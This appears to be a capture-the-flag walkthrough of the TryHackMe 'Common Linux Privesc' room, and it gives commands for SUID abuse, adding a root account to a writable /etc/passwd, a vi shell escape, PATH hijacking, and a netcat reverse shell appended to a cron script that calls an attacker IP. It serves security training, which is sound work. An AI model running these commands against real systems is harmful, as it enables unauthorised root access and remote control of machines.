Common Linux Privesc

Room Link: https://tryhackme.com/room/commonlinuxprivesc

Enumeration

Download LinEnum Script

Kali

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Login to host

Kali

ssh user3@$VICTIM
Password: password

The target's hostname

There are 8 users

4 shells

Some users can write to passwd file

Abusing SUID/GUID Files

Victim

find / -perm -u=s -type f 2>/dev/null

Running the shell script in user3 home directory gives us root access right away.

Victim

/home/user3/shell

Exploiting Writeable /etc/passwd

Victim

su user7
Password: password

Victim

openssl passwd -1 -salt new 123
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
cat /etc/passwd

su new
Password: 123

Escaping Vi Editor

Victim

su user8
Password: password

Victim

sudo -l

Victim

sudo vi
:!sh
whoami

Exploiting Crontab

Victim

ssh user4@$VICTIM
Password: password

Kali

msfvenom -p cmd/unix/reverse_netcat lhost=$KALI lport=8888 R

Kali

nc -lvnp 8888

Victim

cat /etc/crontab 

Add our payload we made in Kali to the script

Victim

echo 'mkfifo /tmp/cibykaz; nc 10.10.185.2 8888 0</tmp/cibykaz | /bin/sh >/tmp/cibykaz 2>&1; rm /tmp/cibykaz' >> /home/user4/Desktop/autoscript.sh

Wait for the script to run and catch the shell on Kali.

Exploiting PATH Variable

Victim

su user5
Password: password

The script in user5 home directory is just doing the command ls.

Victim

cd /home/user5
./script

We now create a script called ls that gives us a bash shell.

Victim

cd /tmp
echo "/bin/bash" > ls
chmod +x ls

Before we change the path we can see ls goes to /bin/ls

Now after running the below command ls is now directed to our script.

Victim

export PATH=/tmp:$PATH

Now the script in user5s directory acts differently, we now have a root shell.

Victim

cd /home/user5
/script 

Run the following to reset the path variable.

Victim

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH